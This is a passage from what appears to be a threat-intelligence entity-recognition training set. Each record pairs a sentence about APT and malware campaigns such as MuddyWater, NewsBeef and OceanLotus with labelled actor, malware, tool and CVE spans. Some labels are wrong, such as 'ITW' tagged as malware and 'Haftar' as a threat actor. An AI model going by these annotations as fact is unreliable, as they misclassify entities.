{"ORGANIZATION: Rapid7": [[0, 6]]}, "info": {"id": "dnrti_train_002826", "source": "dnrti_train"}} {"text": "We believe APT10 is the most significant known Chinese state-sponsored cyber threat to global corporations .", "spans": {"THREAT_ACTOR: APT10": [[11, 16]]}, "info": {"id": "dnrti_train_002827", "source": "dnrti_train"}} {"text": "This campaign brings to light further evidence supporting the assertions made by the Five Eyes nations , led by the U.S Department of Justice indictment against APT10 actors outlining the unprecedented scale of economic cyberespionage being conducted by the Chinese Ministry of State Security .", "spans": {"THREAT_ACTOR: APT10": [[161, 166]]}, "info": {"id": "dnrti_train_002829", "source": 
"dnrti_train"}} {"text": "This report , alongside the plethora of other reporting on APT10 operations , acutely highlights the vulnerability of organizational supply chains .", "spans": {"THREAT_ACTOR: APT10": [[59, 64]]}, "info": {"id": "dnrti_train_002830", "source": "dnrti_train"}} {"text": "We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor .", "spans": {"THREAT_ACTOR: groups": [[15, 21]], "VULNERABILITY: CVE-2018-0798": [[35, 48]]}, "info": {"id": "dnrti_train_002831", "source": "dnrti_train"}} {"text": "The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 .", "spans": {"MALWARE: ITW": [[32, 35]], "MALWARE: RTF": [[195, 198]]}, "info": {"id": "dnrti_train_002835", "source": "dnrti_train"}} {"text": "CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption .", "spans": {"VULNERABILITY: CVE-2018-0798": [[0, 13]], "THREAT_ACTOR: threat actor": [[91, 103]]}, "info": {"id": "dnrti_train_002836", "source": "dnrti_train"}} {"text": "As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity .", "spans": {"VULNERABILITY: CVE-2017-11882": [[28, 42]], "VULNERABILITY: CVE-2018-0802": [[47, 60]], "TOOL: weaponizer": [[67, 77]], "THREAT_ACTOR: actors": [[126, 132]]}, "info": {"id": "dnrti_train_002837", "source": "dnrti_train"}} {"text": "Upon decrypting and executing , it drops two additional files wsc_proxy.exe” (legitimate Avast 
executable) and a malicious DLL wsc.dll” in the %TEMP% folder .", "spans": {"MALWARE: wsc_proxy.exe”": [[62, 76]], "MALWARE: wsc.dll”": [[127, 135]]}, "info": {"id": "dnrti_train_002838", "source": "dnrti_train"}} {"text": "However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit (CVE-2018-0798) .", "spans": {"ORGANIZATION: we": [[38, 40]], "MALWARE: AsyncRAT": [[104, 112]]}, "info": {"id": "dnrti_train_002839", "source": "dnrti_train"}} {"text": "Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer .", "spans": {"THREAT_ACTOR: threat groups": [[90, 103]], "VULNERABILITY: CVE-2018-0798": [[122, 135]], "TOOL: RTF weaponizer": [[145, 159]]}, "info": {"id": "dnrti_train_002840", "source": "dnrti_train"}} {"text": "These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers .", "spans": {"THREAT_ACTOR: threat groups": [[37, 50]], "VULNERABILITY: CVE-2018-0798": [[103, 116]]}, "info": {"id": "dnrti_train_002841", "source": "dnrti_train"}} {"text": "In addition , a current ANY.RUN playback of our observed Elise infection is also available .", "spans": {"MALWARE: ANY.RUN": [[24, 31]], "MALWARE: Elise": [[57, 62]]}, "info": {"id": "dnrti_train_002842", "source": "dnrti_train"}} {"text": "Most recently though , a new campaign , targeting Belarus , Turkey and Ukraine , has emerged that caught the attention of Check Point researchers .", "spans": {"ORGANIZATION: Check Point": [[122, 133]]}, "info": {"id": "dnrti_train_002845", "source": "dnrti_train"}} {"text": "The well-crafted and socially engineered malicious documents then become the first stage of a long and mainly fileless infection chain that 
eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group .", "spans": {"MALWARE: POWERSTATS": [[158, 168]], "MALWARE: PowerShell backdoor": [[183, 202]], "THREAT_ACTOR: threat group": [[211, 223]]}, "info": {"id": "dnrti_train_002846", "source": "dnrti_train"}} {"text": "If the macros in SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc” are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe” .", "spans": {"MALWARE: SPK KANUN": [[17, 26]], "MALWARE: CiscoAny.exe”": [[151, 164]]}, "info": {"id": "dnrti_train_002848", "source": "dnrti_train"}} {"text": "INF files have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll .", "spans": {"TOOL: INF files": [[0, 8]], "THREAT_ACTOR: MuddyWater": [[39, 49]], "TOOL: Advpack.dll": [[86, 97]], "TOOL: IEAdvpack.dll": [[106, 119]]}, "info": {"id": "dnrti_train_002849", "source": "dnrti_train"}} {"text": "Although it has focused most of its efforts on the Middle East region , the political affiliations , motives and purposes behind MuddyWater’s attacks are not very well- defined , thus earning it its name .", "spans": {"THREAT_ACTOR: MuddyWater’s": [[128, 140]]}, "info": {"id": "dnrti_train_002851", "source": "dnrti_train"}} {"text": "In the past , countries such as Saudi Arabia , the UAE and Turkey have been a MuddyWater's main target , but the campaigns have also reached a much wider audience , making their way to victims in countries such as Belarus and Ukraine .", "spans": {"THREAT_ACTOR: MuddyWater's": [[78, 90]]}, "info": {"id": "dnrti_train_002852", "source": "dnrti_train"}} {"text": "MuddyWater target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]]}, "info": {"id": "dnrti_train_002853", "source": "dnrti_train"}} {"text": "Most recently MuddyWater were connected to a campaign in March that 
targeted organizations in Turkey , Pakistan , and Tajikistan .", "spans": {"THREAT_ACTOR: MuddyWater": [[14, 24]]}, "info": {"id": "dnrti_train_002854", "source": "dnrti_train"}} {"text": "The group has been quite visible since the initial 2017 Malwarebytes report on their elaborate espionage attack against the Saudi Arabian government .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_002855", "source": "dnrti_train"}} {"text": "Our analysis revealed that they drop a new backdoor , which is written in PowerShell as MuddyWater’s known POWERSTATS backdoor .", "spans": {"THREAT_ACTOR: MuddyWater’s": [[88, 100]], "TOOL: POWERSTATS backdoor": [[107, 126]]}, "info": {"id": "dnrti_train_002856", "source": "dnrti_train"}} {"text": "We assume that RunPow stands for run PowerShell , ” and triggers the PowerShell code embedded inside the .dll file .", "spans": {"MALWARE: PowerShell": [[37, 47]], "MALWARE: .dll file": [[105, 114]]}, "info": {"id": "dnrti_train_002857", "source": "dnrti_train"}} {"text": "This backdoor has some features similar to a previously discovered version of the Muddywater backdoor .", "spans": {"TOOL: backdoor": [[5, 13]], "THREAT_ACTOR: Muddywater": [[82, 92]]}, "info": {"id": "dnrti_train_002858", "source": "dnrti_train"}} {"text": "Based on our analysis , we can confirm that MuddyWater target Turkish government organizations related to the finance and energy sectors .", "spans": {"THREAT_ACTOR: MuddyWater": [[44, 54]]}, "info": {"id": "dnrti_train_002859", "source": "dnrti_train"}} {"text": "This is yet another similarity with previous MuddyWater campaigns , which were known to have targeted multiple Turkish government entities .", "spans": {"THREAT_ACTOR: MuddyWater": [[45, 55]]}, "info": {"id": "dnrti_train_002860", "source": "dnrti_train"}} {"text": "The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents .", 
"spans": {"MALWARE: backdoor": [[41, 49]]}, "info": {"id": "dnrti_train_002861", "source": "dnrti_train"}} {"text": "Trend Micro™ Deep Discovery™ provides detection , in-depth analysis , and proactive response to today’s stealthy malware , and targeted attacks in real time .", "spans": {"ORGANIZATION: Trend Micro™": [[0, 12]], "THREAT_ACTOR: attacks": [[136, 143]]}, "info": {"id": "dnrti_train_002862", "source": "dnrti_train"}} {"text": "MuddyWater first surfaced in 2017 .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]]}, "info": {"id": "dnrti_train_002863", "source": "dnrti_train"}} {"text": "First stage infections and graphical decoys have been described by multiple sources , including in our previous research MuddyWater expands operations .", "spans": {"THREAT_ACTOR: MuddyWater": [[121, 131]]}, "info": {"id": "dnrti_train_002864", "source": "dnrti_train"}} {"text": "MuddyWater compiles various offensive Python scripts .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]], "TOOL: Python": [[38, 44]], "TOOL: scripts": [[45, 52]]}, "info": {"id": "dnrti_train_002865", "source": "dnrti_train"}} {"text": "This includes Python scripts .", "spans": {}, "info": {"id": "dnrti_train_002866", "source": "dnrti_train"}} {"text": "Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll” , Ext_server_extapi.x64.dll” , and Ext_server_espia.x64.dll” extensions .", "spans": {"MALWARE: Stageless Meterpreter": [[14, 35]], "MALWARE: Ext_server_stdapi.x64.dll”": [[44, 70]], "MALWARE: Ext_server_extapi.x64.dll”": [[73, 99]], "MALWARE: Ext_server_espia.x64.dll”": [[106, 131]]}, "info": {"id": "dnrti_train_002867", "source": "dnrti_train"}} {"text": "The January 2017 report followed up on other private reports published on the group’s BeEF-related activity in 2015 and 2016 .", "spans": {"THREAT_ACTOR: BeEF-related": [[86, 98]]}, "info": {"id": "dnrti_train_002868", "source": "dnrti_train"}} {"text": "Previous analysis of the NewsBeef APT indicates that the group focuses on 
Saudi Arabian (SA) and Western targets , and lacks advanced offensive technology development capabilities .", "spans": {"THREAT_ACTOR: NewsBeef": [[25, 33]]}, "info": {"id": "dnrti_train_002869", "source": "dnrti_train"}} {"text": "However , in the summer of 2016 , NewsBeef deployed a new toolset that includes macro-enabled Office documents , PowerSploit , and the Pupy backdoor .", "spans": {"THREAT_ACTOR: NewsBeef": [[34, 42]], "TOOL: macro-enabled Office documents": [[80, 110]], "TOOL: PowerSploit": [[113, 124]], "TOOL: Pupy backdoor": [[135, 148]]}, "info": {"id": "dnrti_train_002870", "source": "dnrti_train"}} {"text": "The most recent NewsBeef campaign uses this toolset in conjunction with spearphishing emails , links sent over social media/standalone private messaging applications , and watering hole attacks that leverage compromised high-profile websites some belonging to the SA government .", "spans": {"THREAT_ACTOR: NewsBeef": [[16, 24]]}, "info": {"id": "dnrti_train_002871", "source": "dnrti_train"}} {"text": "The NewsBeef actor deployed a new toolset in a campaign that focused primarily on Saudi Arabian targets .", "spans": {"THREAT_ACTOR: NewsBeef": [[4, 12]]}, "info": {"id": "dnrti_train_002872", "source": "dnrti_train"}} {"text": "NewsBeef continues to deploy malicious macro-enabled Office documents , poisoned legitimate Flash and Chrome installers , PowerSploit , and Pupy tools .", "spans": {"THREAT_ACTOR: NewsBeef": [[0, 8]], "TOOL: Flash": [[92, 97]], "TOOL: Chrome installers": [[102, 119]], "TOOL: PowerSploit": [[122, 133]], "TOOL: Pupy tools": [[140, 150]]}, "info": {"id": "dnrti_train_002873", "source": "dnrti_train"}} {"text": "The NewsBeef campaign is divided into two main attack vectors , spearphishing and strategic web compromise watering hole attacks .", "spans": {"THREAT_ACTOR: NewsBeef": [[4, 12]]}, "info": {"id": "dnrti_train_002874", "source": "dnrti_train"}} {"text": "On December 25 , 2016 , the NewsBeef APT stood up a server to host a 
new set of Microsoft Office documents (maintaining malicious macros and PowerShell scripts) to support its spear-phishing operations .", "spans": {"THREAT_ACTOR: NewsBeef": [[28, 36]]}, "info": {"id": "dnrti_train_002875", "source": "dnrti_train"}} {"text": "These compromised servers include Saudi Arabian government servers and other high-value organizational identities relevant to NewsBeef's targets .", "spans": {"THREAT_ACTOR: NewsBeef's": [[126, 136]]}, "info": {"id": "dnrti_train_002876", "source": "dnrti_train"}} {"text": "However , Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client outlook.live.com” as well as attachments arriving through the Outlook desktop application .", "spans": {"ORGANIZATION: Kaspersky": [[10, 19]], "MALWARE: outlook.live.com”": [[119, 136]]}, "info": {"id": "dnrti_train_002877", "source": "dnrti_train"}} {"text": "Interestingly , NewsBeef set up its server using the hosting provider Choopa , LLC , US” , the same hosting provider that the group used in attacks over the summer of 2016 .", "spans": {"THREAT_ACTOR: NewsBeef": [[16, 24]], "TOOL: Choopa": [[70, 76]], "TOOL: LLC": [[79, 82]], "TOOL: US”": [[85, 88]]}, "info": {"id": "dnrti_train_002878", "source": "dnrti_train"}} {"text": "NTG’s IT focus and client list likely aided NewsBeef’s delivery of malicious PowerShell-enabled Office documents and poisoned installers .", "spans": {"ORGANIZATION: NTG’s": [[0, 5]], "THREAT_ACTOR: NewsBeef’s": [[44, 54]]}, "info": {"id": "dnrti_train_002879", "source": "dnrti_train"}} {"text": "In other schemes , NewsBeef sent macro-enabled Office attachments from spoofed law firm identities or other relevant service providers to targets in SA .", "spans": {"THREAT_ACTOR: NewsBeef": [[19, 27]]}, "info": {"id": "dnrti_train_002880", "source": "dnrti_train"}} {"text": "The law firm in this scheme is based in the United Kingdom and is the sole location for targets outside of SA for this campaign .", 
"spans": {"THREAT_ACTOR: targets": [[88, 95]]}, "info": {"id": "dnrti_train_002881", "source": "dnrti_train"}} {"text": "Starting in October 2016 , NewsBeef compromised a set of legitimate servers (shown below) , and injected JavaScript to redirect visitors to http://analytics-google.org:69/Check.aspx .", "spans": {"THREAT_ACTOR: NewsBeef": [[27, 35]]}, "info": {"id": "dnrti_train_002882", "source": "dnrti_train"}} {"text": "For example , on a Saudi government website , the NewsBeef APT delivered packed JavaScript into the bottom of a referenced script that is included in every page served from the site the packed and unpacked JavaScript is shown below .", "spans": {"THREAT_ACTOR: NewsBeef": [[50, 58]], "TOOL: JavaScript": [[206, 216]]}, "info": {"id": "dnrti_train_002883", "source": "dnrti_train"}} {"text": "A high volume of redirections from the compromised site continues into mid-January 2017 .", "spans": {"THREAT_ACTOR: redirections": [[17, 29]]}, "info": {"id": "dnrti_train_002885", "source": "dnrti_train"}} {"text": "However , as this recent campaign indicates , the NewsBeef APT appears to have shifted its intrusion toolset away from BeEF and towards macro-enabled malicious Office documents , PowerSploit , and Pupy .", "spans": {"THREAT_ACTOR: NewsBeef": [[50, 58]], "TOOL: Office documents": [[160, 176]], "TOOL: PowerSploit": [[179, 190]], "TOOL: Pupy": [[197, 201]]}, "info": {"id": "dnrti_train_002886", "source": "dnrti_train"}} {"text": "Despite this shift in toolset , the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic.net .", "spans": {}, "info": {"id": "dnrti_train_002887", "source": "dnrti_train"}} {"text": "Its attack activities can be traced back to April 2012 .", "spans": {}, "info": {"id": "dnrti_train_002888", "source": "dnrti_train"}} {"text": "The OceanLotus reflects a very strong confrontational ability and willing to attack by keep evolving their techniques .", 
"spans": {"THREAT_ACTOR: OceanLotus": [[4, 14]]}, "info": {"id": "dnrti_train_002889", "source": "dnrti_train"}} {"text": "These APT attacks and adopting confrontation measures will exist for a long time .", "spans": {"THREAT_ACTOR: APT": [[6, 9]], "ORGANIZATION: adopting confrontation measures": [[22, 53]]}, "info": {"id": "dnrti_train_002890", "source": "dnrti_train"}} {"text": "OceanLotus’ targets are global .", "spans": {"THREAT_ACTOR: OceanLotus’": [[0, 11]]}, "info": {"id": "dnrti_train_002891", "source": "dnrti_train"}} {"text": "OceanLotus have been actively using since at least early 2018 .", "spans": {"THREAT_ACTOR: OceanLotus": [[0, 10]]}, "info": {"id": "dnrti_train_002892", "source": "dnrti_train"}} {"text": "OceanLotus malware family samples used no earlier than 2017 .", "spans": {"THREAT_ACTOR: OceanLotus": [[0, 10]]}, "info": {"id": "dnrti_train_002893", "source": "dnrti_train"}} {"text": "We identified two methods to deliver the KerrDown downloader to targets .", "spans": {"ORGANIZATION: We": [[0, 2]], "MALWARE: KerrDown": [[41, 49]]}, "info": {"id": "dnrti_train_002894", "source": "dnrti_train"}} {"text": "The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon .", "spans": {"MALWARE: KerrDown": [[33, 41]], "ORGANIZATION: we": [[97, 99]]}, "info": {"id": "dnrti_train_002895", "source": "dnrti_train"}} {"text": "While investigating KerrDown we found multiple RAR files containing a variant of the malware .", "spans": {"MALWARE: KerrDown": [[20, 28]], "ORGANIZATION: we": [[29, 31]]}, "info": {"id": "dnrti_train_002896", "source": "dnrti_train"}} {"text": "Therefore , it is clear that the OceanLotus group works during weekdays and takes a break during the weekends .", "spans": {"THREAT_ACTOR: OceanLotus": [[33, 43]]}, "info": {"id": "dnrti_train_002897", "source": "dnrti_train"}} {"text": "The group was first revealed and 
named by SkyEye Team in May 2015 .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_002898", "source": "dnrti_train"}} {"text": "OceanLotus's targets include China's maritime institutions , maritime construction , scientific research institutes and shipping enterprises .", "spans": {"THREAT_ACTOR: OceanLotus's": [[0, 12]], "ORGANIZATION: maritime institutions": [[37, 58]], "ORGANIZATION: maritime construction": [[61, 82]], "ORGANIZATION: scientific research institutes": [[85, 115]], "ORGANIZATION: shipping enterprises": [[120, 140]]}, "info": {"id": "dnrti_train_002899", "source": "dnrti_train"}} {"text": "RedDrip Team (formerly SkyEye Team) has been to OceanLotus to keep track of high strength , groupactivity , found it in the near future to Indochinese Peninsula countries since 2019 On April 1 , 2019 , RedDrip discovered a Vietnamese file name Hop dong sungroup.rar in the process of daily monitoring the attack activities of the OceanLotus .", "spans": {"THREAT_ACTOR: OceanLotus": [[48, 58], [330, 340]], "ORGANIZATION: RedDrip": [[202, 209]]}, "info": {"id": "dnrti_train_002900", "source": "dnrti_train"}} {"text": "COCCOC is a Vietnam was founded in 2013 .", "spans": {"THREAT_ACTOR: COCCOC": [[0, 6]]}, "info": {"id": "dnrti_train_002901", "source": "dnrti_train"}} {"text": "In fact , according to reports of various security vendors , OceanLotus also attacked several countries , including Cambodia , Thailand , Laos , even some victims in Vietnam , like opinion leaders , media , real estate companies , foreign enterprises and banks .", "spans": {"THREAT_ACTOR: OceanLotus": [[61, 71]]}, "info": {"id": "dnrti_train_002902", "source": "dnrti_train"}} {"text": "Unlike the 2016 variants of Ratsnif that stored all packets to a PCAP file .", "spans": {"THREAT_ACTOR: Ratsnif": [[28, 35]]}, "info": {"id": "dnrti_train_002903", "source": "dnrti_train"}} {"text": "these threat actors targeted a number of government agencies Threat actors targeted a 
number of government agencies in East Asia .", "spans": {"THREAT_ACTOR: Threat actors": [[61, 74]]}, "info": {"id": "dnrti_train_002904", "source": "dnrti_train"}} {"text": "Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "VULNERABILITY: CVE-2018-0798": [[54, 67]]}, "info": {"id": "dnrti_train_002905", "source": "dnrti_train"}} {"text": "Maudi Surveillance Operation which was previously reported in 2013 .", "spans": {"THREAT_ACTOR: Maudi": [[0, 5]]}, "info": {"id": "dnrti_train_002906", "source": "dnrti_train"}} {"text": "specifically CVE-2018-0798 , before downloading subsequent payloads .", "spans": {"VULNERABILITY: CVE-2018-0798": [[13, 26]]}, "info": {"id": "dnrti_train_002907", "source": "dnrti_train"}} {"text": "The dropped PE file has the distinctive file name 8.t” .", "spans": {"TOOL: PE": [[12, 14]], "MALWARE: 8.t”": [[50, 54]]}, "info": {"id": "dnrti_train_002908", "source": "dnrti_train"}} {"text": "The last process is utilized as part of the loading process for Cotx RAT and involves the legitimate Symantec binary noted above .", "spans": {"THREAT_ACTOR: Cotx RAT": [[64, 72]], "ORGANIZATION: Symantec": [[101, 109]]}, "info": {"id": "dnrti_train_002909", "source": "dnrti_train"}} {"text": "These conflicts have even resulted in Haftar leading an attack on the capital city in April .", "spans": {"THREAT_ACTOR: Haftar": [[38, 44]]}, "info": {"id": "dnrti_train_002910", "source": "dnrti_train"}} {"text": "The attackers have targeted a large number of organizations globally since early 2017 .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "dnrti_train_002911", "source": "dnrti_train"}} {"text": "Attackers were initially discovered while investigating a phishing attack that targeted political figures in the MENA region .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]]}, "info": {"id": 
"dnrti_train_002912", "source": "dnrti_train"}} {"text": "Group's targets include high-profile entities such as parliaments , senates , top state offices and officials , political science scholars , military and intelligence agencies , ministries , media outlets , research centers , election commissions , Olympic organizations , large trading companies , and other unknown entities .", "spans": {"THREAT_ACTOR: Group's": [[0, 7]], "ORGANIZATION: parliaments": [[54, 65]], "ORGANIZATION: senates": [[68, 75]], "ORGANIZATION: top state offices": [[78, 95]], "ORGANIZATION: officials": [[100, 109]], "ORGANIZATION: political science scholars": [[112, 138]], "ORGANIZATION: intelligence agencies": [[154, 175]], "ORGANIZATION: election commissions": [[226, 246]], "ORGANIZATION: Olympic organizations": [[249, 270]], "ORGANIZATION: trading companies": [[279, 296]], "ORGANIZATION: unknown entities": [[309, 325]]}, "info": {"id": "dnrti_train_002913", "source": "dnrti_train"}} {"text": "Cisco Talos recently published a blogpost describing targeted attacks in the Middle East region which we believe may be connected .", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]]}, "info": {"id": "dnrti_train_002914", "source": "dnrti_train"}} {"text": "Operation Parliament appears to be another symptom of escalating tensions in the Middle East region .", "spans": {"THREAT_ACTOR: Operation Parliament": [[0, 20]]}, "info": {"id": "dnrti_train_002915", "source": "dnrti_train"}} {"text": "The attackers have taken great care to stay under the radar , imitating another attack group in the region .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "dnrti_train_002916", "source": "dnrti_train"}} {"text": "With deception and false flags increasingly being employed by threat actors , attribution is a hard and complicated task that requires solid evidence , especially in complex regions such as the Middle East .", "spans": {"THREAT_ACTOR: threat actors": [[62, 75]]}, "info": {"id": 
"dnrti_train_002917", "source": "dnrti_train"}} {"text": "We refer to this campaign and the associated actor as Operation Kingphish Malik” , in one of its written forms in Arabic , translates to King” .", "spans": {"THREAT_ACTOR: Operation Kingphish": [[54, 73]]}, "info": {"id": "dnrti_train_002922", "source": "dnrti_train"}} {"text": "It is worth noting that in December 2016 , Amnesty International published an investigation into another social engineering campaign perpetrated by a seemingly fake human rights organization known as Voiceless Victims , which targeted international human rights and labour rights organizations campaigning on migrant workers’ rights in Qatar .", "spans": {"THREAT_ACTOR: Voiceless": [[200, 209]]}, "info": {"id": "dnrti_train_002923", "source": "dnrti_train"}} {"text": "In the course of this email correspondence , the attacker — Safeena” — then sent what appeared to be invitations to access several documents on Google Drive .", "spans": {"THREAT_ACTOR: attacker": [[49, 57]]}, "info": {"id": "dnrti_train_002925", "source": "dnrti_train"}} {"text": "The attackers were meticulous in making their phishing page as credible as possible .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "dnrti_train_002926", "source": "dnrti_train"}} {"text": "Among the targets of this campaign is the International Trade Union Confederation (ITUC) .", "spans": {"ORGANIZATION: Trade Union Confederation": [[56, 81]]}, "info": {"id": "dnrti_train_002927", "source": "dnrti_train"}} {"text": "Both in the attacks against ITUC and in other occasions , Operation Kingphish approached selected targets over social media , prominently Facebook , and engaged in chat conversations with them on and off , sometimes over a period of several months .", "spans": {"ORGANIZATION: ITUC": [[28, 32]], "THREAT_ACTOR: Operation Kingphish": [[58, 77]], "TOOL: social media": [[111, 123]], "TOOL: prominently Facebook": [[126, 146]]}, "info": {"id": "dnrti_train_002928", 
"source": "dnrti_train"}} {"text": "This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar .", "spans": {"MALWARE: document": [[14, 22]]}, "info": {"id": "dnrti_train_002929", "source": "dnrti_train"}} {"text": "While there is a clear underlying Qatar migrant workers theme in Operation Sheep , it is also hypothetically possible that these attacks could have been perpetrated by a malicious actor affiliated to a different government with an interest in damaging the reputation of the State of Qatar .", "spans": {"THREAT_ACTOR: Operation Sheep": [[65, 80]]}, "info": {"id": "dnrti_train_002930", "source": "dnrti_train"}} {"text": "The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store .", "spans": {"TOOL: SDK": [[4, 7]], "MALWARE: SWAnalytics": [[16, 27]]}, "info": {"id": "dnrti_train_002932", "source": "dnrti_train"}} {"text": "This paper will cover the discovery of this campaign , dubbed ‘Operation Sheep’ , and an analysis of SWAnalytics .", "spans": {"THREAT_ACTOR: ‘Operation Sheep’": [[62, 79]]}, "info": {"id": "dnrti_train_002936", "source": "dnrti_train"}} {"text": "In mid-September , an app named ‘Network Speed Master’ stood out on our radar with its rather unusual behavior patterns .", "spans": {"THREAT_ACTOR: ‘Network Speed Master’": [[32, 54]]}, "info": {"id": "dnrti_train_002937", "source": "dnrti_train"}} {"text": "From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category .", "spans": {"MALWARE: malicious sample": [[15, 31]]}, "info": {"id": "dnrti_train_002941", "source": "dnrti_train"}} {"text": "Operation Sheep is the first campaign we have observed in the wild that abuses similar 
concept since our MitD publication .", "spans": {"THREAT_ACTOR: Operation Sheep": [[0, 15]]}, "info": {"id": "dnrti_train_002943", "source": "dnrti_train"}} {"text": "Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” .", "spans": {"MALWARE: SWAnalytics": [[69, 80]]}, "info": {"id": "dnrti_train_002945", "source": "dnrti_train"}} {"text": "In order to understand SWAnalytics’ impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets .", "spans": {"MALWARE: SWAnalytics’": [[23, 35]]}, "info": {"id": "dnrti_train_002946", "source": "dnrti_train"}} {"text": "Data points span from September 2018 to January 2019 where we observed over 17 million downloads in just five months .", "spans": {"ORGANIZATION: we": [[59, 61]]}, "info": {"id": "dnrti_train_002947", "source": "dnrti_train"}} {"text": "In China alone , we have seen underground market sheep shavers” ported SMS rogue marketing strategy to spread Alipay Red Packet referral URL links .", "spans": {"THREAT_ACTOR: sheep shavers”": [[49, 63]]}, "info": {"id": "dnrti_train_002948", "source": "dnrti_train"}} {"text": "According to Cheetah Mobile’s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK .", "spans": {"MALWARE: Batmobi": [[106, 113]], "MALWARE: Duapps": [[116, 122]], "MALWARE: Cheetah SDK": [[141, 152]]}, "info": {"id": "dnrti_train_002950", "source": "dnrti_train"}} {"text": "It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns .", "spans": {"THREAT_ACTOR: actor": [[31, 36]], "TOOL: Panda Banker": [[51, 63]], "ORGANIZATION: Arbor": [[128, 
133]], "MALWARE: Panda Banker": [[204, 216]]}, "info": {"id": "dnrti_train_002951", "source": "dnrti_train"}} {"text": "Webinjects targeting Japan , a country we haven’t seen targeted by Panda Banker before .", "spans": {"MALWARE: Panda Banker": [[67, 79]]}, "info": {"id": "dnrti_train_002952", "source": "dnrti_train"}} {"text": "Japan is no stranger to banking malware .", "spans": {"MALWARE: banking": [[24, 31]], "MALWARE: malware": [[32, 39]]}, "info": {"id": "dnrti_train_002953", "source": "dnrti_train"}} {"text": "Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware .", "spans": {"MALWARE: Ursnif": [[76, 82]], "MALWARE: Urlzone": [[87, 94]]}, "info": {"id": "dnrti_train_002954", "source": "dnrti_train"}} {"text": "This post was our first analysis of the first Panda Banker campaign that we’ve seen to target financial institutions in Japan .", "spans": {"MALWARE: Panda Banker": [[46, 58]]}, "info": {"id": "dnrti_train_002955", "source": "dnrti_train"}} {"text": "Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities , like the military , governments , defense industries , and the media .", "spans": {"THREAT_ACTOR: Operation Pawn Storm": [[0, 20]]}, "info": {"id": "dnrti_train_002956", "source": "dnrti_train"}} {"text": "We believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems .", "spans": {"ORGANIZATION: We": [[0, 2]], "MALWARE: SEDNIT": [[112, 118]]}, "info": {"id": "dnrti_train_002957", "source": "dnrti_train"}} {"text": "We found two malicious iOS applications in Operation Pawn Storm .", "spans": {"ORGANIZATION: We": [[0, 2]]}, "info": {"id": "dnrti_train_002958", "source": "dnrti_train"}} {"text": "One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ 
